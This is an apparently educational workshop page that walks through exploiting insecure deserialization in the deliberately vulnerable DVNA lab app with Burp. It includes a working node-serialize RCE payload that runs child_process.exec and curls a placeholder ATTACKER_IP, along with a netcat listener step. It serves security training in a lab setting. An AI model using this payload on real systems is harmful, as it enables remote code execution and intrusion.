infosecgirls
Appsec
Appsec
  • Introduction
  • Application Details
    • VM - Pre-req
    • Import Virtual Machines
    • Access Mutillidae Web Application
  • INITIAL SETUP WITH OWASP ZAP
    • OWASP ZAP
    • Setup OWASP ZAP
    • Modes
    • Automated Scan
    • Report Generation
  • Initial Setup with Burp
    • Start Burp Suite
    • Add FoxyProxy Addon
    • Add New Proxy In FoxyProxy
    • Configure Proxy Listener
    • Install Burp's CA Certificate In Firefox
    • Getting Rid of Unnecessary Browser Traffic
  • Quick Basics
    • Disable Intercept Mode in Burp
    • Enable Intercept Mode in Burp
    • Send to Repeater
    • Send to Comparer
  • Web Application Pentesting
    • A1 - Injection
      • SQL Injection with bWAPP
      • SQL Injection in DVNA
      • Command Injection in DVNA
    • A2 - Broken Authentication
      • Broken Authentication with bWAPP
    • A3 - Sensitive Data Exposure
      • Sensitive Data Exposure - DVNA
    • A4 - XML External Entities (XXE)
      • XML External Entity (XXE) Injection - Mutillidae
      • XML External Entity (XXE) Injection - DVNA
    • A5 - Broken Access Control
      • Broken Access Control - DVNA
    • A6 - Security Misconfiguration
      • Security Misconfiguration in DVNA
      • Security Misconfiguration in Mutillidae
      • Security Misconfiguration in Security Shepherd
    • A7 - Cross-Site Scripting (XSS)
      • Reflected XSS
      • DOM XSS
      • Stored XSS - Mutillidae
      • XSS - Sending data to remote server
    • A8 - Insecure Deserialization
      • Insecure Deserialization - DVNA
    • A9 - Using Components with Known Vulnerabilities
      • Using Components with Known Vulnerabilities - DVNA
    • 10 - Insufficient Logging & Monitoring
    • References
    • About Us
  • Additional Content
    • Insecure Direct Object Reference
    • Security Misconfiguration
    • Password Guessing Attack
    • User Enumeration
      • Unauthenticated User Access
      • Create a New User
      • Authenticated User Access
      • Intruder: Set Positions
      • Intruder: Define Payload
      • Intruder: Configure Grep - Extract
      • Trigger Attack & Save Results
    • Custom Iterator
    • Null Payload
    • Request in Browser: Privilege Escalation Check
  • Burp Extenders
    • Target
    • Proxy
    • Intruder
    • Repeater
    • Sequencer
    • Decoder
    • Comparer
    • Extender
Powered by GitBook
On this page

Was this helpful?

  1. Web Application Pentesting
  2. A8 - Insecure Deserialization

Insecure Deserialization - DVNA

PreviousA8 - Insecure DeserializationNextA9 - Using Components with Known Vulnerabilities

Last updated 4 years ago

Was this helpful?

Lets change the settings of Virtual Machines

Go to Settings

Click on Network -> Change the adapter to NAT Network

For this exercise we would need two Virtual Machines

a) Kali Linux

b) Global AppSec SF VM

Access the AppSec Global SF VM url from the Kali Box

http://10.0.2.14:9090

Step 1: Navigate to "A8: Insecure Deserialization" > Insecure Deserialization: Legacy Import Products. Notice that the URL is http://127.0.0.1:9090/app/bulkproducts?legacy=true and it presents a "Bulk Import Products" feature has a file upload functionality which accepts a serialized object.

Step 2: Let's upload a serialised object and check if the file upload is vulnerable. Save the following snippet into the file and save it with and upload it using "Bulk Import Products" feature. Intercept the POST request made using Burp. Make sure to replace "ATTACKER_IP" with the address of attacker machine that the victim machine can connect to.

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('id; curl http://ATTACKER_IP:8081', function(error, stdout, stderr) { console.log(stdout) });}()"}

Step 3: Send the intercepted request to Burp Repeater(CTRL+R) and navigate to repeater(CTRL+SHIFT+R)

Step 4: On the attacker machine (kali Linux - 10.0.2.12), run nc -lvvp 8081. In the Burp repeater, forward the request. Notice that on the attacker machine nc will receive a connection from the victim machine. This is because the serialised object we uploaded got insecurely deserialised and the command got executed which connects to the attacker machine.